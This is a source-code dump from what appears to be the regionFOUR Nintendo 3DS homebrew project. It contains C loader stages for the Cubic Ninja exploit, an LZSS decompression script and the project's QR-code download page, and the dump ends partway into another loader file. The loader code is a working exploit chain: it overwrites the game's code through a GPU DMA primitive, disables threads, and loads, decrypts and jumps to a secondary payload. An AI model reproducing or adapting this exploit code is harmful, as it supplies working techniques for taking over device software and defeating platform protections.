242 | 		blowfishKeyScheduler((u32*)0x14200000);
243 | 		blowfishDecrypt((u32*)0x14200000, (u32*)0x14100000, (u32*)0x14100000, secondaryPayloadSize);
244 | 	}
245 | 
246 | 	ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
247 | 
248 | 	doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000);
249 | 
250 | 	svc_sleepThread(0x3B9ACA00);
251 | 
252 | 	// //close thread handles
253 | 	// ret=svc_closeHandle(*((Handle*)0x359938));
254 | 	// ret=svc_closeHandle(*((Handle*)0x34FEA4));
255 | 	// ret=svc_closeHandle(*((Handle*)0x356274));
256 | 	// ret=svc_closeHandle(*((Handle*)0x334730));
257 | 	// ret=svc_closeHandle(*((Handle*)0x334F64));
258 | 
259 | 	void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
260 | 	reset(0);
261 | 
262 | 	while(1);
263 | 	return 0;
264 | }
265 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/JPN/cn_initial/source/main.c:
--------------------------------------------------------------------------------
  1 | #include <stdlib.h>
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | #include <ctr/types.h>
  5 | #include <ctr/srv.h>
  6 | #include <ctr/svc.h>
  7 | #include <ctr/FS.h>
  8 | #include "text.h"
  9 | 
 10 | #include "../../../../build/constants.h"
 11 | 
 12 | int _strlen(char* str)
 13 | {
 14 | 	int l=0;
 15 | 	while(*(str++))l++;
 16 | 	return l;
 17 | }
 18 | 
 19 | void _strcpy(char* dst, char* src)
 20 | {
 21 | 	while(*src)*(dst++)=*(src++);
 22 | 	*dst=0x00;
 23 | }
 24 | 
 25 | Result _srv_getServiceHandle(Handle* handleptr, Handle* out, char* server)
 26 | {
 27 | 	u8 l=_strlen(server);
 28 | 	if(!out || !server || l>8)return -1;
 29 | 
 30 | 	u32* cmdbuf=getThreadCommandBuffer();
 31 | 
 32 | 	cmdbuf[0]=0x50100; //request header code
 33 | 	_strcpy((char*)&cmdbuf[1], server);
 34 | 	cmdbuf[3]=l;
 35 | 	cmdbuf[4]=0x0;
 36 | 
 37 | 	Result ret=0;
 38 | 	if((ret=svc_sendSyncRequest(*handleptr)))return ret;
 39 | 
 40 | 	*out=cmdbuf[3];
 41 | 
 42 | 	return cmdbuf[1];
 43 | }
 44 | 
 45 | // const u8 hexTable[]=
 46 | // {
 47 | // 	'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'
 48 | // };
 49 | 
 50 | // void hex2str(char* out, u32 val)
 51 | // {
 52 | // 	int i;
 53 | // 	for(i=0;i<8;i++){out[7-i]=hexTable[val&0xf];val>>=4;}
 54 | // 	out[8]=0x00;
 55 | // }
 56 | 
 57 | // void drawHex(u32 val, int x, int y)
 58 | // {
 59 | // 	char str[9];
 60 | 
 61 | // 	hex2str(str,val);
 62 | // 	drawString((u8*)CN_CN_TOPFBADR1,str,x,y);
 63 | // 	drawString((u8*)CN_CN_TOPFBADR2,str,x,y);
 64 | // _GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, CN_TOPFBADR1, 0x46500*2);
 65 | // }
 66 | 
 67 | void doGspwn(u32* src, u32* dst, u32 size)
 68 | {
 69 | 	Result (*nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue)(u32** sharedGspCmdBuf, u32* cmdAdr)=(void*)CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue;
 70 | 	u32 gxCommand[]=
 71 | 	{
 72 | 		0x00000004, //command header (SetTextureCopy)
 73 | 		(u32)src, //source address
 74 | 		(u32)dst, //destination address
 75 | 		size, //size
 76 | 		0xFFFFFFFF, // dim in
 77 | 		0xFFFFFFFF, // dim out
 78 | 		0x00000008, // flags
 79 | 		0x00000000, //unused
 80 | 	};
 81 | 
 82 | 	u32** sharedGspCmdBuf=(u32**)(CN_GSPSHAREDBUF_ADR);
 83 | 	nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue(sharedGspCmdBuf, gxCommand);
 84 | }
 85 | 
 86 | Result _GSPGPU_InvalidateDataCache(Handle* handle, Handle kprocess, u32* addr, u32 size)
 87 | {
 88 | 	u32* cmdbuf=getThreadCommandBuffer();
 89 | 
 90 | 	cmdbuf[0]=0x00090082;
 91 | 	cmdbuf[1]=(u32)addr;
 92 | 	cmdbuf[2]=size;
 93 | 	cmdbuf[3]=0x00000000;
 94 | 	cmdbuf[4]=(u32)kprocess;
 95 | 
 96 | 	Result ret=0;
 97 | 	if((ret=svc_sendSyncRequest(*handle)))return ret;
 98 | 
 99 | 	return cmdbuf[1];
100 | }
101 | 
102 | void patchMem(Handle* gspHandle, u32 dst, u32 size, u32 start, u32 end)
103 | {
104 | 	Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
105 | 
106 | 	int i;
107 | 	_GSPGPU_InvalidateDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, size);
108 | 	doGspwn((u32*)(dst), (u32*)(0x14100000), size);
109 | 	svc_sleepThread(0x100000);
110 | 	for(i=start;i<end;i++)((u32*)0x14100000)[i]=0xEF000009;
111 | 	_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, size);
112 | 	doGspwn((u32*)(0x14100000), (u32*)(dst), size);
113 | 	svc_sleepThread(0x100000);
114 | }
115 | 
116 | Result _FSUSER_OpenFileDirectly(Handle* handle, Handle* out, FS_archive archive, FS_path fileLowPath, u32 openflags, u32 attributes) //no need to have archive opened
117 | {
118 | 	u32* cmdbuf=getThreadCommandBuffer();
119 | 
120 | 	cmdbuf[0]=0x08030204;
121 | 	cmdbuf[1]=0;
122 | 	cmdbuf[2]=archive.id;
123 | 	cmdbuf[3]=archive.lowPath.type;
124 | 	cmdbuf[4]=archive.lowPath.size;
125 | 	cmdbuf[5]=fileLowPath.type;
126 | 	cmdbuf[6]=fileLowPath.size;
127 | 	cmdbuf[7]=openflags;
128 | 	cmdbuf[8]=attributes;
129 | 	cmdbuf[9]=(archive.lowPath.size<<14)|0x802;
130 | 	cmdbuf[10]=(u32)archive.lowPath.data;
131 | 	cmdbuf[11]=(fileLowPath.size<<14)|2;
132 | 	cmdbuf[12]=(u32)fileLowPath.data;
133 |  
134 | 	Result ret=0;
135 | 	if((ret=svc_sendSyncRequest(*handle)))return ret;
136 |  
137 | 	if(out)*out=cmdbuf[3];
138 |  
139 | 	return cmdbuf[1];
140 | }
141 | 
142 | Result _FSFILE_Close(Handle handle)
143 | {
144 | 	u32* cmdbuf=getThreadCommandBuffer();
145 | 
146 | 	cmdbuf[0]=0x08080000;
147 | 
148 | 	Result ret=0;
149 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
150 | 
151 | 	return cmdbuf[1];
152 | }
153 | 
154 | Result _FSFILE_Read(Handle handle, u32 *bytesRead, u64 offset, u32 *buffer, u32 size)
155 | {
156 | 	u32 *cmdbuf=getThreadCommandBuffer();
157 |  
158 | 	cmdbuf[0]=0x080200C2;
159 | 	cmdbuf[1]=(u32)offset;
160 | 	cmdbuf[2]=(u32)(offset>>32);
161 | 	cmdbuf[3]=size;
162 | 	cmdbuf[4]=(size<<4)|12;
163 | 	cmdbuf[5]=(u32)buffer;
164 |  
165 | 	Result ret=0;
166 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
167 | 
168 | 	if(bytesRead)*bytesRead=cmdbuf[2];
169 | 
170 | 	return cmdbuf[1];
171 | }
172 | 
173 | u32 computeCodeAddress(u32 offset)
174 | {
175 | 	return CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+FIRM_APPMEMALLOC+offset;
176 | }
177 | 
178 | void paintScreen(u8 r, u8 g, u8 b)
179 | {
180 | 	for(int i=0; i<0x46500;i+=3)
181 | 	{
182 | 		((u8*)CN_TOPFBADR1)[i+0]=((u8*)CN_TOPFBADR2)[i+0]=r;
183 | 		((u8*)CN_TOPFBADR1)[i+1]=((u8*)CN_TOPFBADR2)[i+1]=g;
184 | 		((u8*)CN_TOPFBADR1)[i+2]=((u8*)CN_TOPFBADR2)[i+2]=b;
185 | 	}
186 | }
187 | 
188 | int _main()
189 | {
190 | 	Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
191 | 	Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
192 | 
193 | 	paintScreen(0x00,0x00,0x00);
194 | 	// drawString((u8*)CN_TOPFBADR1,"ninjhaxx",0,0);
195 | 	// drawString((u8*)CN_TOPFBADR2,"ninjhaxx",0,0);
196 | 
197 | 	Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
198 | 
199 | 	int line=10;
200 | 	Result ret;
201 | 
202 | 	Handle* addressArbiterHandle=(Handle*)0x003414B0;
203 | 
204 | 	Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
205 | 	Handle** dspHandle=(Handle**)0x341A4C;
206 | 
207 | 	_DSP_UnloadComponent(*dspHandle);
208 | 
209 | 	//close threads
210 | 		//patch gsp event handler addr to kill gsp thread ASAP
211 | 		*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
212 | 
213 | 		//patch waitSyncN
214 | 		patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
215 | 		patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
216 | 		patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
217 | 		// patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
218 | 		// patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
219 | 
220 | 		//patch arbitrateAddress
221 | 		patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
222 | 
223 | 		//wake threads
224 | 		svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
225 | 		svc_signalEvent(((Handle*)0x354ba8)[2]);
226 | 		s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
227 | 
228 | 		//kill thread5 without panicking the kernel...
229 | 		*(u8*)(0x3664D8+0xd)=0x00;
230 | 
231 | 	//load secondary payload
232 | 	u32 secondaryPayloadSize;
233 | 	{
234 | 		Result ret;
235 | 		Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
236 | 		FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
237 | 
238 | 		//read secondary payload file
239 | 		Handle fileHandle;
240 | 		ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
241 | 		if(ret)*(u32*)NULL=0xC0DF0002;
242 | 		ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14100000, 0x00011000);
243 | 		if(ret)*(u32*)NULL=0xC0DF0003;
244 | 		ret=_FSFILE_Close(fileHandle);
245 | 		if(ret)*(u32*)NULL=0xC0DF0004;
246 | 	}
247 | 
248 | 	//decrypt it
249 | 	{
250 | 		Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900;
251 | 		Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48;
252 | 
253 | 		blowfishKeyScheduler((u32*)0x14200000);
254 | 		blowfishDecrypt((u32*)0x14200000, (u32*)0x14100000, (u32*)0x14100000, secondaryPayloadSize);
255 | 	}
256 | 
257 | 	ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
258 | 
259 | 	doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000);
260 | 
261 | 	svc_sleepThread(0x3B9ACA00);
262 | 
263 | 	void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
264 | 	reset(0);
265 | 
266 | 	while(1);
267 | 	return 0;
268 | }
269 | 


--------------------------------------------------------------------------------
/scripts/lzss3.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | 
  3 | import sys
  4 | from sys import stdin, stdout, stderr, exit
  5 | from os import SEEK_SET, SEEK_CUR, SEEK_END
  6 | from errno import EPIPE
  7 | from struct import pack, unpack
  8 | 
  9 | __all__ = ('decompress', 'decompress_file', 'decompress_bytes',
 10 |            'decompress_overlay', 'DecompressionError')
 11 | 
 12 | class DecompressionError(ValueError):
 13 |     pass
 14 | 
 15 | def bits(byte):
 16 |     return ((byte >> 7) & 1,
 17 |             (byte >> 6) & 1,
 18 |             (byte >> 5) & 1,
 19 |             (byte >> 4) & 1,
 20 |             (byte >> 3) & 1,
 21 |             (byte >> 2) & 1,
 22 |             (byte >> 1) & 1,
 23 |             (byte) & 1)
 24 | 
 25 | def decompress_raw_lzss10(indata, decompressed_size, _overlay=False):
 26 |     """Decompress LZSS-compressed bytes. Returns a bytearray."""
 27 |     data = bytearray()
 28 | 
 29 |     it = iter(indata)
 30 | 
 31 |     if _overlay:
 32 |         disp_extra = 3
 33 |     else:
 34 |         disp_extra = 1
 35 | 
 36 |     def writebyte(b):
 37 |         data.append(b)
 38 |     def readbyte():
 39 |         return next(it)
 40 |     def readshort():
 41 |         # big-endian
 42 |         a = next(it)
 43 |         b = next(it)
 44 |         return (a << 8) | b
 45 |     def copybyte():
 46 |         data.append(next(it))
 47 | 
 48 |     while len(data) < decompressed_size:
 49 |         b = readbyte()
 50 |         flags = bits(b)
 51 |         for flag in flags:
 52 |             if flag == 0:
 53 |                 copybyte()
 54 |             elif flag == 1:
 55 |                 sh = readshort()
 56 |                 count = (sh >> 0xc) + 3
 57 |                 disp = (sh & 0xfff) + disp_extra
 58 | 
 59 |                 for _ in range(count):
 60 |                     writebyte(data[-disp])
 61 |             else:
 62 |                 raise ValueError(flag)
 63 | 
 64 |             if decompressed_size <= len(data):
 65 |                 break
 66 | 
 67 |     if len(data) != decompressed_size:
 68 |         raise DecompressionError("decompressed size does not match the expected size")
 69 | 
 70 |     return data
 71 | 
 72 | def decompress_raw_lzss11(indata, decompressed_size):
 73 |     """Decompress LZSS-compressed bytes. Returns a bytearray."""
 74 |     data = bytearray()
 75 | 
 76 |     it = iter(indata)
 77 | 
 78 |     def writebyte(b):
 79 |         data.append(b)
 80 |     def readbyte():
 81 |         return next(it)
 82 |     def copybyte():
 83 |         data.append(next(it))
 84 | 
 85 |     while len(data) < decompressed_size:
 86 |         b = readbyte()
 87 |         flags = bits(b)
 88 |         for flag in flags:
 89 |             if flag == 0:
 90 |                 copybyte()
 91 |             elif flag == 1:
 92 |                 b = readbyte()
 93 |                 indicator = b >> 4
 94 | 
 95 |                 if indicator == 0:
 96 |                     # 8 bit count, 12 bit disp
 97 |                     # indicator is 0, don't need to mask b
 98 |                     count = (b << 4)
 99 |                     b = readbyte()
100 |                     count += b >> 4
101 |                     count += 0x11
102 |                 elif indicator == 1:
103 |                     # 16 bit count, 12 bit disp
104 |                     count = ((b & 0xf) << 12) + (readbyte() << 4)
105 |                     b = readbyte()
106 |                     count += b >> 4
107 |                     count += 0x111
108 |                 else:
109 |                     # indicator is count (4 bits), 12 bit disp
110 |                     count = indicator
111 |                     count += 1
112 | 
113 |                 disp = ((b & 0xf) << 8) + readbyte()
114 |                 disp += 1
115 | 
116 |                 try:
117 |                     for _ in range(count):
118 |                         writebyte(data[-disp])
119 |                 except IndexError:
120 |                     raise Exception(count, disp, len(data), sum(1 for x in it) )
121 |             else:
122 |                 raise ValueError(flag)
123 | 
124 |             if decompressed_size <= len(data):
125 |                 break
126 | 
127 |     if len(data) != decompressed_size:
128 |         raise DecompressionError("decompressed size does not match the expected size")
129 | 
130 |     return data
131 | 
132 | 
133 | def decompress_overlay(f, out):
134 |     # the compression header is at the end of the file
135 |     f.seek(-8, SEEK_END)
136 |     header = f.read(8)
137 | 
138 |     # decompression goes backwards.
139 |     # end < here < start
140 | 
141 |     # end_delta == here - decompression end address
142 |     # start_delta == decompression start address - here
143 |     end_delta, start_delta = unpack("<LL", header)
144 | 
145 |     filelen = f.tell()
146 | 
147 |     padding = end_delta >> 0x18
148 |     end_delta &= 0xFFFFFF
149 |     decompressed_size = start_delta + end_delta
150 | 
151 |     f.seek(-end_delta, SEEK_END)
152 | 
153 |     data = bytearray()
154 |     data.extend(f.read(end_delta - padding))
155 |     data.reverse()
156 | 
157 |     #stdout.write(data.tostring())
158 | 
159 |     uncompressed_data = decompress_raw_lzss10(data, decompressed_size,
160 |                                               _overlay=True)
161 |     uncompressed_data.reverse()
162 | 
163 |     # first we write up to the portion of the file which was "overwritten" by
164 |     # the decompressed data, then the decompressed data itself.
165 |     # i wonder if it's possible for decompression to overtake the compressed
166 |     # data, so that the decompression code is reading its own output...
167 |     f.seek(0, SEEK_SET)
168 |     out.write(f.read(filelen - end_delta))
169 |     out.write(uncompressed_data)
170 | 
171 | def decompress(obj):
172 |     """Decompress LZSS-compressed bytes or a file-like object.
173 | 
174 |     Shells out to decompress_file() or decompress_bytes() depending on
175 |     whether or not the passed-in object has a 'read' attribute or not.
176 | 
177 |     Returns a bytearray."""
178 |     if hasattr(obj, 'read'):
179 |         return decompress_file(obj)
180 |     else:
181 |         return decompress_bytes(obj)
182 | 
183 | def decompress_bytes(data):
184 |     """Decompress LZSS-compressed bytes. Returns a bytearray."""
185 |     header = data[:4]
186 |     if header[0] == 0x10:
187 |         decompress_raw = decompress_raw_lzss10
188 |     elif header[0] == 0x11:
189 |         decompress_raw = decompress_raw_lzss11
190 |     else:
191 |         raise DecompressionError("not as lzss-compressed file")
192 | 
193 |     decompressed_size, = unpack("<L", header[1:] + b'\x00')
194 | 
195 |     data = data[4:]
196 |     return decompress_raw(data, decompressed_size)
197 | 
198 | def decompress_file(f):
199 |     """Decompress an LZSS-compressed file. Returns a bytearray.
200 | 
201 |     This isn't any more efficient than decompress_bytes, as it reads
202 |     the entire file into memory. It is offered as a convenience.
203 |     """
204 |     header = f.read(4)
205 |     if header[0] == 0x10:
206 |         decompress_raw = decompress_raw_lzss10
207 |     elif header[0] == 0x11:
208 |         decompress_raw = decompress_raw_lzss11
209 |     else:
210 |         raise DecompressionError("not as lzss-compressed file")
211 | 
212 |     decompressed_size, = unpack("<L", header[1:] + b'\x00')
213 | 
214 |     data = f.read()
215 |     return decompress_raw(data, decompressed_size)
216 | 
217 | def main(args=None):
218 |     if args is None:
219 |         args = sys.argv[1:]
220 | 
221 |     if '--overlay' in args:
222 |         args.remove('--overlay')
223 |         overlay = True
224 |     else:
225 |         overlay = False
226 | 
227 |     if len(args) < 1 or args[0] == '-':
228 |         if overlay:
229 |             print("Can't decompress overlays from stdin", file=stderr)
230 |             return 2
231 | 
232 |         if hasattr(stdin, 'buffer'):
233 |             f = stdin.buffer
234 |         else:
235 |             f = stdin
236 |     else:
237 |         try:
238 |             f = open(args[0], "rb")
239 |         except IOError as e:
240 |             print(e, file=stderr)
241 |             return 2
242 | 
243 |     stdout = sys.stdout
244 |     if hasattr(stdout, 'buffer'):
245 |         # grab the underlying binary stream
246 |         stdout = stdout.buffer
247 | 
248 |     try:
249 |         if overlay:
250 |             decompress_overlay(f, stdout)
251 |         else:
252 |             stdout.write(decompress_file(f))
253 |     except IOError as e:
254 |         if e.errno == EPIPE:
255 |             # don't complain about a broken pipe
256 |             pass
257 |         else:
258 |             raise
259 |     except (DecompressionError,) as e:
260 |         print(e, file=stderr)
261 |         return 1
262 | 
263 |     return 0
264 | 
265 | 
266 | 
267 | if __name__ == '__main__':
268 |     exit(main())
269 |     


--------------------------------------------------------------------------------
/web/index.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  2 | <html xmlns="http://www.w3.org/1999/xhtml">
  3 | <head>
  4 | <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 | <title>regionFOUR - 3DS region free loader</title>
  6 | <meta name="keywords" content="homebrew" />
  7 | <meta name="description" content="ds" />
  8 | <link href='http://fonts.googleapis.com/css?family=Homenaje' rel='stylesheet' type='text/css'>
  9 | <link href="hbrew.css" rel="stylesheet" type="text/css" media="all" /><link rel="shortcut icon" href="images/icon.png"/>
 10 | 
 11 |   <style type='text/css'>
 12 |     .firmware-form {
 13 |         /*margin-top:300px;*/
 14 |         text-align:center;
 15 |         font-size:26px;
 16 |     }
 17 |     .firmware-form select {
 18 |         /*width:50px;*/
 19 |         height:50px;
 20 |         font-size:26px;
 21 |         text-align:center;
 22 | 		border: 5px solid #ffffff;
 23 | 		background: #000000;
 24 | 		color: #ffffff;
 25 |     }
 26 | 
 27 | 	.firmware-form button {
 28 | 		border: 5px solid #ffffff;
 29 | 		background: #000000;
 30 | 		border-radius: 0px;
 31 | 		box-shadow: rgba(255,255,255,0.4) 0 0px 0, inset rgba(255,255,255,0.4) 0 0px 0;
 32 | 		color: #ffffff;
 33 | 		font-family: helvetica, serif;
 34 |         height:50px;
 35 |         font-size:26px;
 36 | 		text-decoration: none;
 37 | 		vertical-align: middle;
 38 |    }
 39 |   </style>
 40 | 
 41 | <script>
 42 |     (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
 43 |     (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
 44 |     m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
 45 |     })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
 46 | 
 47 |     ga('create', 'UA-56939276-1', 'auto');
 48 |     ga('send', 'pageview');
 49 | </script>
 50 |   
 51 | <script type='text/javascript'>//<![CDATA[ 
 52 | window.onload=function(){
 53 | ;
 54 | (function () {
 55 |     'use strict';
 56 | 
 57 |     var regions = {
 58 |         'E' : {},
 59 |         'U' : {},
 60 |         'J' : {}
 61 |     }
 62 | 
 63 |     var NUPs_1 = {
 64 |         '7' : regions,
 65 |         '8' : regions,
 66 |         '9' : regions,
 67 |         '10' : regions,
 68 |         '11' : regions,
 69 |         '12' : regions,
 70 |         '13' : regions,
 71 |         '14' : regions,
 72 |         '15' : regions,
 73 |         '16' : regions,
 74 |         '17' : regions,
 75 |         '18' : regions,
 76 |         '19' : regions,
 77 |         '20' : regions,
 78 |         '21' : regions,
 79 |         '22' : regions,
 80 |         '23' : regions,
 81 |         '24' : regions,
 82 |         '25' : regions,
 83 |         '26' : regions,
 84 |         '27' : regions,
 85 |         '28' : regions,
 86 |         '29' : regions,
 87 |         '999' : regions,
 88 |     }
 89 | 
 90 |     var zeroMicro_1 = {
 91 |         '0' : NUPs_1
 92 |     }
 93 | 
 94 |     var oldOptions = {
 95 |         '9': {
 96 |             '0': zeroMicro_1,
 97 |             '1': zeroMicro_1,
 98 |             '2': zeroMicro_1,
 99 |             '3': zeroMicro_1,
100 |             '4': zeroMicro_1,
101 |             '5': zeroMicro_1,
102 |             '6': zeroMicro_1,
103 |             '7': zeroMicro_1,
104 |             '8': zeroMicro_1
105 |         }
106 |     }
107 | 
108 |     var newRegions = {
109 |         'J' : {},
110 |         'U' : {},
111 |         'E' : {}
112 |     }
113 | 
114 |     var newOptions = {
115 |         '9': {
116 |             '0': zeroMicro_1,
117 |             '1': zeroMicro_1,
118 |             '2': zeroMicro_1,
119 |             '3': zeroMicro_1,
120 |             '4': zeroMicro_1,
121 |             '5': zeroMicro_1,
122 |             '6': zeroMicro_1,
123 |             '7': zeroMicro_1,
124 |             '8': zeroMicro_1
125 |         }
126 |     }
127 | 
128 |     var options = {
129 |         'OLD': oldOptions,
130 |         'NEW': newOptions
131 |     }
132 | 
133 |     var state = {};
134 | 
135 |     var range = function (a, b) {
136 |         var xs = [];
137 |         for (var i = a; i < b; ++i)
138 |         xs.push(i);
139 |         return xs;
140 |     };
141 | 
142 |     var update = function (id) {
143 |         var node = document.querySelector('[data-id="' + id + '"]');
144 | 
145 |         if (!node) {
146 |             return;
147 |         }
148 | 
149 |         range(id, 5).map(function (i) {
150 |             delete state[i];
151 |         });
152 | 
153 |         node.innerHTML = '';
154 | 
155 |         var lens = range(0, id).reduce(function (acc, i) {
156 |             return acc[state[i]] || {};
157 |         }, options);
158 | 
159 |         Object.keys(lens).map(function (v) {
160 |             var opt = document.createElement('option');
161 |             opt.value = v;
162 |             opt.innerHTML = v;
163 | 
164 |             node.appendChild(opt);
165 |         });
166 |         state[id] = state[id] || Object.keys(lens)[0];
167 | 
168 |         update(id + 1);
169 |     };
170 | 
171 |     /* NodeList does not have map */
172 |     var selects = document.querySelectorAll('.firmware-form select');
173 |     for (var i = 0; i < selects.length; ++i) {
174 |         selects[i].addEventListener('change', function (e) {
175 |             state[e.target.dataset.id] = e.target.value;
176 |             update(parseInt(e.target.dataset.id, 10) + 1);
177 |         });
178 |     }
179 | 
180 |     update(0);
181 | 
182 |     // document.querySelector('.firmware-form').addEventListener('submit', function (e) {
183 |     //     e.preventDefault();
184 |     //     alert(state[0] + '.' + state[1] + '.' + state[2] + '-' + state[3] + state[4]);
185 |     // });
186 | 
187 | })();
188 | }//]]>  
189 | 
190 | </script>
191 | 
192 | 
193 | </head>
194 | <body>
195 | <!-- <div id="wrapper"> -->
196 | 
197 | 		<div id="toplogo">
198 | 			<img src="images/ninjhax3.png" alt="NINJHAX" />
199 | 		</div>
200 | 
201 | 		<div id="content">
202 | 			<div>
203 | 				<ul class="style1">
204 | 					<li>
205 | 						<h2 class="title"><a name="whatis">&gt; What is <strong>regionFOUR</strong> ?</a></h2>
206 | 						<p>
207 | 							<strong>regionFOUR</strong> is a region free loader for New3DS/New3DSXL/3DS/3DSXL/2DS which currently works on on firmware versions 9.0 through 9.8 (including 9.1, 9.2, 9.3, 9.4, 9.5, 9.6 and 9.7). It also allows you to bypass mandatory gamecard firmware updates. It currently requires that you own a copy of <strong>Cubic Ninja</strong> from your region in order to run. To see it in action, <a href="https://youtu.be/CwvJqM2rDWg">look no further</a>.
208 | 						</p>
209 | 
210 | 						<h2 class="title"><a name="howinstall">&gt; How do I run <strong>regionFOUR</strong> ?</a></h2>
211 | 						<p>
212 | 							<p style="padding-left: 2em;">
213 | 							<strong>1</strong>. Go to the <a href="#qrcode">get <strong>regionFOUR</strong></a> section of this page and enter your console's firmware version. <br/>
214 | 							<strong>2</strong>. Hit submit; you should get your very own <strong>regionFOUR</strong> QR code. <br/>
215 | 							<strong>4</strong>. Make sure your 3DS's wifi connection is enabled and connected to the internet (this is important!). <br/>
216 | 							<strong>5</strong>. Start CUBIC NINJA on your console, choose "Create", then "QR code", and finally "Scan QR code". <br/>
217 | 							<strong>6</strong>. Scan the QR Code. This step might take a couple tries; make sure you fill up as much of your 3DS's screen with the QR code. If scanning the QR code returns to menu with an error, try a few more times. <br/>
218 |                             <strong>7</strong>. Follow the on screen instructions. You may choose not to install the exploit to your gamecard's savedata, though doing so is not recommended. <br/>
219 | 							<strong>8</strong>. Once <strong>regionFOUR</strong> is ready, you will be prompted to insert your out-of-region gamecard. Simply remove the Cubic Ninja gamecard, insert your gamecard and press START. <br/>
220 |                             <strong>9</strong>. <strong>OPTIONAL</strong> - once the <strong>regionFOUR</strong> is installed to your gamecard, just go back to the "QR code" menu and it'll run automatically! <br/>
221 | 							</p>
222 |                         </p>
223 | 
224 |                         <h2 class="title"><a name="qrcode">&gt; Get <strong>regionFOUR</strong></a></h2>
225 |                         <p>
226 |                             Select your console's firmware version (only select NEW if you are running this on a New 3DS (XL)) : <br/>
227 |                             <form class="firmware-form" action="qr_code.png" method="post">
228 |                                 <select data-id="0" name="five"></select> 
229 |                                 <select data-id="1" name="zero"></select>.
230 |                                 <select data-id="2" name="one"></select>.
231 |                                 <select data-id="3" name="two"></select>-
232 |                                 <select data-id="4" name="three"></select>
233 |                                 <select data-id="5" name="four"></select>
234 |                                 <button type="submit" >Submit</button>
235 |                             </form>
236 |                         </p>
237 | 
238 | 						<h2 class="title"><a name="faq">&gt; Frequently Asked Questions</a></h2>
239 | 						<p>
240 | 							For more information on <strong>regionFOUR</strong>, and its source code, please visit <a href="https://github.com/smealum/regionFOUR/blob/master/README.md">its github page</a>.
241 | 						</p>
242 |                     </li>
243 | 
244 | 				</ul>
245 | 		  </div>
246 | 	</div>
247 |   </div>
248 | 	<div id="footer" class="container">
249 | 		<p>Follow smea on twitter : <a href="http://twitter.com/smealum">@smealum</a></p>
250 | 	</div>
251 | <!-- </div> -->
252 | </body>
253 | </html>
254 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/cn_initial/source/main.c:
--------------------------------------------------------------------------------
  1 | #include <stdlib.h>
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | #include <ctr/types.h>
  5 | #include <ctr/srv.h>
  6 | #include <ctr/svc.h>
  7 | #include "text.h"
  8 | 
  9 | #include "../../../../build/constants.h"
 10 | 
 11 | #define TOPFBADR1 ((u8*)CN_TOPFBADR1)
 12 | #define TOPFBADR2 ((u8*)CN_TOPFBADR2)
 13 | 
 14 | int _strlen(char* str)
 15 | {
 16 | 	int l=0;
 17 | 	while(*(str++))l++;
 18 | 	return l;
 19 | }
 20 | 
 21 | void _strcpy(char* dst, char* src)
 22 | {
 23 | 	while(*src)*(dst++)=*(src++);
 24 | 	*dst=0x00;
 25 | }
 26 | 
 27 | //?
 28 | Result HTTPC_Initialize(Handle handle)
